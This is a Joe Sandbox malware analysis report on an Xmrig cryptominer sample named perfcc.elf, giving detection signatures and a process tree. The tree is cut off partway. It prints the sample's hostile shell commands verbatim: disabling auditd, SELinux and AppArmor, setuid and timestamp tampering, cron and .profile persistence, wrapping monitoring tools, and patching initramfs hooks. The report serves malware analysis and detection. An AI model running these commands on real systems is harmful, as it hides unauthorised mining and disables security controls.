Edit tour

Linux Analysis Report
perfcc.elf

Overview

General Information

Sample name:	perfcc.elf
Analysis ID:	1530712
MD5:	656e22c65bf7c04d87b5afbe52b8d800
SHA1:	0fd199053171fec86be186106eac717c4edae2ad
SHA256:	22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Xmrig cryptocurrency miner

Creates /etc/ld.so.preload

Drops files in suspicious directories

Executes itself again with its parent PID as an argument (indicative of hampering debugging)

Executes the "crontab" command typically for achieving persistence

Executes the "getconf" command for querying system configuration variables

Executes the "who" command used to get a list of logged in users

Explicitly modifies time stamps using the "touch" command

Found Tor onion address

Found strings related to Crypto-Mining

Machine Learning detection for dropped file

Machine Learning detection for sample

May use the Tor software to hide its network traffic

Sample deletes itself

Sample reads /proc/mounts (often used for finding a writable filesystem)

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to persist itself using cron

Terminates several processes with shell command 'killall'

Writes ELF files to hidden directories

Writes identical ELF files to multiple locations

Changes permissions of common UNIX (system) binary directories

Creates hidden files and/or directories

Drops files with innocent-looking names

ELF contains segments with high entropy indicating compressed/encrypted content

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "grep" command used to find patterns in files or piped streams

Executes the "kill" or "pkill" command typically used to terminate processes

Executes the "nohup" (no hangup) command used to avoid background terminal process from being killed

Executes the "ps" command used to list the status of processes

Executes the "rm" command used to delete files or directories

Executes the "systemctl" command used for controlling the systemd system and service manager

Executes the "touch" command used to create files or modify time stamps

May check the online IP address of the machine

Reads CPU information from /proc indicative of miner or evasive malware

Reads CPU information from /sys indicative of miner or evasive malware

Reads system information from the proc file system

Reads the 'hosts' file potentially containing internal network hosts

Sample and/or dropped files contains symbols with suspicious names

Sample contains only a LOAD segment without any section mappings

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Sample tries to set the executable flag

Sets full permissions to files and/or directories

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Writes shell script file to disk with an unusual file extension

Yara signature match

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1530712
Start date and time:	2024-10-10 12:59:43 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	perfcc.elf
Detection:	MAL
Classification:	mal100.spre.troj.evad.mine.linELF@0/86@2/0

Warnings

Report size exceeded maximum capacity and may have missing behavior information.
VT rate limit hit for: /usr/bin/.local/bin/htop

Runtime Messages

Command:	/tmp/perfcc.elf
PID:	6239
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

perfcc.elf (PID: 6239, Parent: 6159, MD5: 656e22c65bf7c04d87b5afbe52b8d800) Arguments: /tmp/perfcc.elf

perfcc.elf New Fork (PID: 6244, Parent: 6239)

getconf (PID: 6244, Parent: 6239, MD5: 4c206cdb0a9f19e43beb204006c4067f) Arguments: getconf CLK_TCK

perfcc.elf New Fork (PID: 6246, Parent: 6239)

getconf (PID: 6246, Parent: 6239, MD5: 4c206cdb0a9f19e43beb204006c4067f) Arguments: getconf PAGESIZE

perfcc.elf New Fork (PID: 6247, Parent: 6239)

sh (PID: 6247, Parent: 6239, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin;nohup /tmp/perfcc.elf >/dev/null 2>/dev/null & exit"

sh New Fork (PID: 6252, Parent: 6247)

nohup (PID: 6252, Parent: 1860, MD5: d8d3ce4d7f4b1e3ac3c3e7c9790f22ca) Arguments: nohup /tmp/perfcc.elf

perfcc.elf (PID: 6252, Parent: 1860, MD5: 656e22c65bf7c04d87b5afbe52b8d800) Arguments: /tmp/perfcc.elf

perfcc.elf New Fork (PID: 6257, Parent: 6252)

getconf (PID: 6257, Parent: 6252, MD5: 4c206cdb0a9f19e43beb204006c4067f) Arguments: getconf CLK_TCK

perfcc.elf New Fork (PID: 6259, Parent: 6252)

getconf (PID: 6259, Parent: 6252, MD5: 4c206cdb0a9f19e43beb204006c4067f) Arguments: getconf PAGESIZE

perfcc.elf New Fork (PID: 6264, Parent: 6252)

sh (PID: 6264, Parent: 6252, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cp /proc/6252/exe /tmp/.perf.c/raid5wq && chmod +x /tmp/.perf.c/raid5wq"

sh New Fork (PID: 6265, Parent: 6264)

cp (PID: 6265, Parent: 6264, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp /proc/6252/exe /tmp/.perf.c/raid5wq

sh New Fork (PID: 6267, Parent: 6264)

chmod (PID: 6267, Parent: 6264, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /tmp/.perf.c/raid5wq

perfcc.elf New Fork (PID: 6268, Parent: 6252)

sh (PID: 6268, Parent: 6252, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "PATH=/tmp/.perf.c:/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin;raid5wq -p &"

sh New Fork (PID: 6269, Parent: 6268)

raid5wq (PID: 6269, Parent: 1860, MD5: 656e22c65bf7c04d87b5afbe52b8d800) Arguments: raid5wq -p

raid5wq New Fork (PID: 6274, Parent: 6269)

getconf (PID: 6274, Parent: 6269, MD5: 4c206cdb0a9f19e43beb204006c4067f) Arguments: getconf CLK_TCK

raid5wq New Fork (PID: 6276, Parent: 6269)

getconf (PID: 6276, Parent: 6269, MD5: 4c206cdb0a9f19e43beb204006c4067f) Arguments: getconf PAGESIZE

raid5wq New Fork (PID: 6279, Parent: 6269)

sh (PID: 6279, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "auditctl -e0"

raid5wq New Fork (PID: 6280, Parent: 6269)

sh (PID: 6280, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "echo 0 > /sys/fs/selinux/enforce"

raid5wq New Fork (PID: 6281, Parent: 6269)

sh (PID: 6281, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "setenforce 0"

raid5wq New Fork (PID: 6308, Parent: 6269)

sh (PID: 6308, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "if systemctl status auditd|grep -q 'enabled;';then systemctl stop auditd;systemctl disable auditd;fi"

sh New Fork (PID: 6309, Parent: 6308)

systemctl (PID: 6309, Parent: 6308, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl status auditd

sh New Fork (PID: 6310, Parent: 6308)

grep (PID: 6310, Parent: 6308, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -q enabled;

raid5wq New Fork (PID: 6311, Parent: 6269)

sh (PID: 6311, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "if systemctl status apparmor|grep -q 'enabled;';then systemctl stop apparmor;systemctl disable apparmor;fi"

sh New Fork (PID: 6312, Parent: 6311)

systemctl (PID: 6312, Parent: 6311, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl status apparmor

sh New Fork (PID: 6313, Parent: 6311)

grep (PID: 6313, Parent: 6311, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -q enabled;

sh New Fork (PID: 6314, Parent: 6311)

systemctl (PID: 6314, Parent: 6311, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop apparmor

sh New Fork (PID: 6316, Parent: 6311)

systemctl (PID: 6316, Parent: 6311, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl disable apparmor

systemctl New Fork (PID: 6317, Parent: 6316)

systemd-sysv-install (PID: 6317, Parent: 6316, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /lib/systemd/systemd-sysv-install disable apparmor

systemd-sysv-install New Fork (PID: 6320, Parent: 6317)

getopt (PID: 6320, Parent: 6317, MD5: 1a12f43596437b1bf346d52618b3b1b7) Arguments: getopt -o r: --long root: -- disable apparmor

systemd-sysv-install New Fork (PID: 6321, Parent: 6317)

update-rc.d (PID: 6321, Parent: 6317, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/sbin/update-rc.d apparmor defaults

update-rc.d New Fork (PID: 6322, Parent: 6321)

systemctl (PID: 6322, Parent: 6321, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

systemd-sysv-install New Fork (PID: 6327, Parent: 6317)

update-rc.d (PID: 6327, Parent: 6317, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/sbin/update-rc.d apparmor disable

update-rc.d New Fork (PID: 6328, Parent: 6327)

systemctl (PID: 6328, Parent: 6327, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

raid5wq New Fork (PID: 6329, Parent: 6269)

sh (PID: 6329, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "chmod 4755 /bin/wizlmsh"

sh New Fork (PID: 6330, Parent: 6329)

chmod (PID: 6330, Parent: 6329, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 4755 /bin/wizlmsh

raid5wq New Fork (PID: 6334, Parent: 6269)

sh (PID: 6334, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "touch -acmr /bin/sh /bin/wizlmsh"

sh New Fork (PID: 6337, Parent: 6334)

touch (PID: 6337, Parent: 6334, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/sh /bin/wizlmsh

raid5wq New Fork (PID: 6361, Parent: 6269)

sh (PID: 6361, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "touch -acmr /bin/sh /bin/perfcc"

sh New Fork (PID: 6362, Parent: 6361)

touch (PID: 6362, Parent: 6361, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/sh /bin/perfcc

raid5wq New Fork (PID: 6366, Parent: 6269)

sh (PID: 6366, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "(crontab -l|grep -v -e perfcc -e /tmp/.perf;echo '11 * * * * /root/.config/cron/perfcc')|crontab -"

sh New Fork (PID: 6367, Parent: 6366)

sh New Fork (PID: 6369, Parent: 6367)

crontab (PID: 6369, Parent: 6367, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 6370, Parent: 6367)

grep (PID: 6370, Parent: 6367, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v -e perfcc -e /tmp/.perf

sh New Fork (PID: 6368, Parent: 6366)

crontab (PID: 6368, Parent: 6366, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

raid5wq New Fork (PID: 6371, Parent: 6269)

sh (PID: 6371, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "sed -n -i '/perfcc/d;p;1a test -x /bin/perfcc && FPROF=p /bin/perfcc' /root/.profile;touch -acmr /bin/sh /root/.profile"

sh New Fork (PID: 6372, Parent: 6371)

sed (PID: 6372, Parent: 6371, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -n -i "/perfcc/d;p;1a test -x /bin/perfcc && FPROF=p /bin/perfcc" /root/.profile

sh New Fork (PID: 6373, Parent: 6371)

touch (PID: 6373, Parent: 6371, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/sh /root/.profile

raid5wq New Fork (PID: 6374, Parent: 6269)

sh (PID: 6374, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cp /proc/6269/exe /lib/libpprocps.so && chmod +x /lib/libpprocps.so"

sh New Fork (PID: 6375, Parent: 6374)

cp (PID: 6375, Parent: 6374, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp /proc/6269/exe /lib/libpprocps.so

sh New Fork (PID: 6378, Parent: 6374)

chmod (PID: 6378, Parent: 6374, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /lib/libpprocps.so

raid5wq New Fork (PID: 6379, Parent: 6269)

sh (PID: 6379, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cp /proc/6269/exe /lib/libfsnldev.so && chmod +x /lib/libfsnldev.so"

sh New Fork (PID: 6380, Parent: 6379)

cp (PID: 6380, Parent: 6379, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp /proc/6269/exe /lib/libfsnldev.so

sh New Fork (PID: 6385, Parent: 6379)

chmod (PID: 6385, Parent: 6379, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /lib/libfsnldev.so

raid5wq New Fork (PID: 6386, Parent: 6269)

top (PID: 6386, Parent: 6269, MD5: da006a0b9b51d56fa3f9690cf204b99f) Arguments: /bin/.local/bin/top

bash (PID: 6386, Parent: 6269, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/.local/bin/top -c "exec '/bin/.local/bin/top' \"$@\"" /bin/.local/bin/top

top (PID: 6386, Parent: 6269, MD5: da006a0b9b51d56fa3f9690cf204b99f) Arguments: /bin/.local/bin/top

bash (PID: 6386, Parent: 6269, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/.local/bin/top -c " " /bin/.local/bin/top

bash New Fork (PID: 6387, Parent: 6386)

env (PID: 6387, Parent: 6386, MD5: a07608ea9b03212885b826d00c37f0ab) Arguments: env

bash New Fork (PID: 6388, Parent: 6386)

grep (PID: 6388, Parent: 6386, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -q ABWTRX

raid5wq New Fork (PID: 6389, Parent: 6269)

htop (PID: 6389, Parent: 6269, MD5: ad37b13e2476f8e15cf0d22652895d1d) Arguments: /bin/.local/bin/htop

bash (PID: 6389, Parent: 6269, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/.local/bin/htop -c "exec '/bin/.local/bin/htop' \"$@\"" /bin/.local/bin/htop

htop (PID: 6389, Parent: 6269, MD5: ad37b13e2476f8e15cf0d22652895d1d) Arguments: /bin/.local/bin/htop

bash (PID: 6389, Parent: 6269, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/.local/bin/htop -c " " /bin/.local/bin/htop

bash New Fork (PID: 6390, Parent: 6389)

env (PID: 6390, Parent: 6389, MD5: a07608ea9b03212885b826d00c37f0ab) Arguments: env

bash New Fork (PID: 6391, Parent: 6389)

grep (PID: 6391, Parent: 6389, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -q ABWTRX

raid5wq New Fork (PID: 6392, Parent: 6269)

crontab (PID: 6392, Parent: 6269, MD5: c65e7bdf676bb1617301efce4b51a409) Arguments: /bin/.local/bin/crontab

bash (PID: 6392, Parent: 6269, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/.local/bin/crontab -c "exec '/bin/.local/bin/crontab' \"$@\"" /bin/.local/bin/crontab

crontab (PID: 6392, Parent: 6269, MD5: c65e7bdf676bb1617301efce4b51a409) Arguments: /bin/.local/bin/crontab

bash (PID: 6392, Parent: 6269, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/.local/bin/crontab -c " " /bin/.local/bin/crontab

bash New Fork (PID: 6393, Parent: 6392)

env (PID: 6393, Parent: 6392, MD5: a07608ea9b03212885b826d00c37f0ab) Arguments: env

bash New Fork (PID: 6394, Parent: 6392)

grep (PID: 6394, Parent: 6392, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -q ABWTRX

raid5wq New Fork (PID: 6395, Parent: 6269)

ldd (PID: 6395, Parent: 6269, MD5: cf265a3a3dd068d0aa0c70248cd6325d) Arguments: /bin/.local/bin/ldd

bash (PID: 6395, Parent: 6269, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/.local/bin/ldd -c "exec '/bin/.local/bin/ldd' \"$@\"" /bin/.local/bin/ldd

ldd (PID: 6395, Parent: 6269, MD5: cf265a3a3dd068d0aa0c70248cd6325d) Arguments: /bin/.local/bin/ldd

bash (PID: 6395, Parent: 6269, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/.local/bin/ldd -c " " /bin/.local/bin/ldd

bash New Fork (PID: 6396, Parent: 6395)

env (PID: 6396, Parent: 6395, MD5: a07608ea9b03212885b826d00c37f0ab) Arguments: env

bash New Fork (PID: 6397, Parent: 6395)

grep (PID: 6397, Parent: 6395, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -q ABWTRX

raid5wq New Fork (PID: 6398, Parent: 6269)

strace (PID: 6398, Parent: 6269, MD5: 55edcbcd4120224d03185f6ab50e0602) Arguments: /bin/.local/bin/strace

bash (PID: 6398, Parent: 6269, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/.local/bin/strace -c "exec '/bin/.local/bin/strace' \"$@\"" /bin/.local/bin/strace

strace (PID: 6398, Parent: 6269, MD5: 55edcbcd4120224d03185f6ab50e0602) Arguments: /bin/.local/bin/strace

bash (PID: 6398, Parent: 6269, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/.local/bin/strace -c " " /bin/.local/bin/strace

bash New Fork (PID: 6401, Parent: 6398)

env (PID: 6401, Parent: 6398, MD5: a07608ea9b03212885b826d00c37f0ab) Arguments: env

bash New Fork (PID: 6402, Parent: 6398)

grep (PID: 6402, Parent: 6398, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -q ABWTRX

raid5wq New Fork (PID: 6403, Parent: 6269)

lsof (PID: 6403, Parent: 6269, MD5: 2053098ddcf12ccea2af8c2c180278e5) Arguments: /bin/.local/bin/lsof

bash (PID: 6403, Parent: 6269, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/.local/bin/lsof -c "exec '/bin/.local/bin/lsof' \"$@\"" /bin/.local/bin/lsof

lsof (PID: 6403, Parent: 6269, MD5: 2053098ddcf12ccea2af8c2c180278e5) Arguments: /bin/.local/bin/lsof

bash (PID: 6403, Parent: 6269, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/.local/bin/lsof -c " " /bin/.local/bin/lsof

bash New Fork (PID: 6404, Parent: 6403)

env (PID: 6404, Parent: 6403, MD5: a07608ea9b03212885b826d00c37f0ab) Arguments: env

bash New Fork (PID: 6405, Parent: 6403)

grep (PID: 6405, Parent: 6403, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -q ABWTRX

raid5wq New Fork (PID: 6406, Parent: 6269)

sh (PID: 6406, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "chmod 755 /bin/.local/bin/*;touch -acmr /etc/passwd /bin/.local/bin/*"

sh New Fork (PID: 6407, Parent: 6406)

chmod (PID: 6407, Parent: 6406, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 755 /bin/.local/bin/crontab /bin/.local/bin/htop /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/strace /bin/.local/bin/top

sh New Fork (PID: 6408, Parent: 6406)

touch (PID: 6408, Parent: 6406, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /etc/passwd /bin/.local/bin/crontab /bin/.local/bin/htop /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/strace /bin/.local/bin/top

raid5wq New Fork (PID: 6409, Parent: 6269)

sh (PID: 6409, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "touch /tmp/lgcdm /tmp/d.xdiag-0;unset AAZHDE;LD_PRELOAD=/tmp/libgcwrap.so LGCEXTR=1 ls -la /tmp > /tmp/lgctr 2>&1;rm -f /tmp/d.xdiag-0 /tmp/lgcdm /tmp/libgcwrap.so"

sh New Fork (PID: 6410, Parent: 6409)

touch (PID: 6410, Parent: 6409, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch /tmp/lgcdm /tmp/d.xdiag-0

sh New Fork (PID: 6411, Parent: 6409)

ls (PID: 6411, Parent: 6409, MD5: e7793f15c2ff7e747b4bc7079f5cd4f7) Arguments: ls -la /tmp

sh New Fork (PID: 6412, Parent: 6409)

rm (PID: 6412, Parent: 6409, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/d.xdiag-0 /tmp/lgcdm /tmp/libgcwrap.so

raid5wq New Fork (PID: 6413, Parent: 6269)

sh (PID: 6413, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "LD_PRELOAD=/tmp/libgcwrap.so sh -c 'echo BAQLznamq9t08rtq7O5LDzm0K5nqROAs|cat > /tmp/lgctr2 2>&1'"

sh New Fork (PID: 6414, Parent: 6413)

sh (PID: 6414, Parent: 6413, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo BAQLznamq9t08rtq7O5LDzm0K5nqROAs|cat > /tmp/lgctr2 2>&1"

sh New Fork (PID: 6415, Parent: 6414)

sh New Fork (PID: 6416, Parent: 6414)

cat (PID: 6416, Parent: 6414, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat

raid5wq New Fork (PID: 6417, Parent: 6269)

sh (PID: 6417, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "chmod g+s /lib/libgcwrap.so"

sh New Fork (PID: 6418, Parent: 6417)

chmod (PID: 6418, Parent: 6417, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod g+s /lib/libgcwrap.so

raid5wq New Fork (PID: 6419, Parent: 6269)

sh (PID: 6419, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "for f in $(find /usr/share/initramfs-tools/hooks -type f 2>/dev/null|xargs grep -s -l 'ldd '|xargs grep -L 'export PATH=.*/\\.local/bin:.PATH');do sed -i '/^#!\\//a export PATH=/bin/.local/bin:$PATH' $f;done"

sh New Fork (PID: 6420, Parent: 6419)

sh New Fork (PID: 6421, Parent: 6420)

find (PID: 6421, Parent: 6420, MD5: b68ef002f84cc54dd472238ba7df80ab) Arguments: find /usr/share/initramfs-tools/hooks -type f

sh New Fork (PID: 6422, Parent: 6420)

xargs (PID: 6422, Parent: 6420, MD5: 67d30da7ca6e766bb5a005e77f928efb) Arguments: xargs grep -s -l "ldd "

xargs New Fork (PID: 6424, Parent: 6422)

grep (PID: 6424, Parent: 6422, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -s -l "ldd " /usr/share/initramfs-tools/hooks/zz-dhclient /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/cryptpassdev /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/copymods /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/compcache /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/cloud-initramfs-dyn-netconf /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/overlayroot /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/ntfs_3g

sh New Fork (PID: 6423, Parent: 6420)

xargs (PID: 6423, Parent: 6420, MD5: 67d30da7ca6e766bb5a005e77f928efb) Arguments: xargs grep -L "export PATH=.*/\\.local/bin:.PATH"

xargs New Fork (PID: 6425, Parent: 6423)

grep (PID: 6425, Parent: 6423, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptroot

sh New Fork (PID: 6426, Parent: 6419)

sed (PID: 6426, Parent: 6419, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i "/^#!\\//a export PATH=/bin/.local/bin:$PATH" /usr/share/initramfs-tools/hooks/btrfs

sh New Fork (PID: 6427, Parent: 6419)

sed (PID: 6427, Parent: 6419, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i "/^#!\\//a export PATH=/bin/.local/bin:$PATH" /usr/share/initramfs-tools/hooks/cryptopensc

sh New Fork (PID: 6428, Parent: 6419)

sed (PID: 6428, Parent: 6419, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i "/^#!\\//a export PATH=/bin/.local/bin:$PATH" /usr/share/initramfs-tools/hooks/cryptroot

raid5wq New Fork (PID: 6429, Parent: 6269)

sh (PID: 6429, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "systemctl --type=service --state=running|grep -F -e cron.service -e crond.service -e unattended-upgrades.service -e nginx.service -e apache2.service -e httpd.service -e ssh.service -e sshd.service -e postfix.service -e dovecot.service -e mariadb.service -e mysql.service -e mysqld.service -e systemd-journald|awk '{print $1}'|xargs -I{} systemctl try-restart {} >/dev/null 2>/dev/null"

sh New Fork (PID: 6431, Parent: 6429)

systemctl (PID: 6431, Parent: 6429, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --type=service --state=running

sh New Fork (PID: 6432, Parent: 6429)

grep (PID: 6432, Parent: 6429, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F -e cron.service -e crond.service -e unattended-upgrades.service -e nginx.service -e apache2.service -e httpd.service -e ssh.service -e sshd.service -e postfix.service -e dovecot.service -e mariadb.service -e mysql.service -e mysqld.service -e systemd-journald

sh New Fork (PID: 6433, Parent: 6429)

awk (PID: 6433, Parent: 6429, MD5: 7e9b2ed1272331cfbd2aac2e5eb3f84b) Arguments: awk "{print $1}"

sh New Fork (PID: 6434, Parent: 6429)

xargs (PID: 6434, Parent: 6429, MD5: 67d30da7ca6e766bb5a005e77f928efb) Arguments: xargs -I{} systemctl try-restart {}

xargs New Fork (PID: 6441, Parent: 6434)

systemctl (PID: 6441, Parent: 6434, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl try-restart ssh.service

xargs New Fork (PID: 6472, Parent: 6434)

systemctl (PID: 6472, Parent: 6434, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl try-restart systemd-journald.service

xargs New Fork (PID: 6579, Parent: 6434)

systemctl (PID: 6579, Parent: 6434, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl try-restart unattended-upgrades.service

raid5wq New Fork (PID: 6430, Parent: 6269)

sh (PID: 6430, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"

raid5wq New Fork (PID: 6435, Parent: 6269)

sh (PID: 6435, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "for f in $(find /usr/share/initramfs-tools/hooks -type f 2>/dev/null|xargs grep -s -l 'ldd '|xargs grep -L 'export PATH=.*/\\.local/bin:.PATH');do sed -i '/^#!\\//a export PATH=/bin/.local/bin:$PATH' $f;done"

sh New Fork (PID: 6436, Parent: 6435)

sh New Fork (PID: 6437, Parent: 6436)

find (PID: 6437, Parent: 6436, MD5: b68ef002f84cc54dd472238ba7df80ab) Arguments: find /usr/share/initramfs-tools/hooks -type f

sh New Fork (PID: 6438, Parent: 6436)

xargs (PID: 6438, Parent: 6436, MD5: 67d30da7ca6e766bb5a005e77f928efb) Arguments: xargs grep -s -l "ldd "

xargs New Fork (PID: 6440, Parent: 6438)

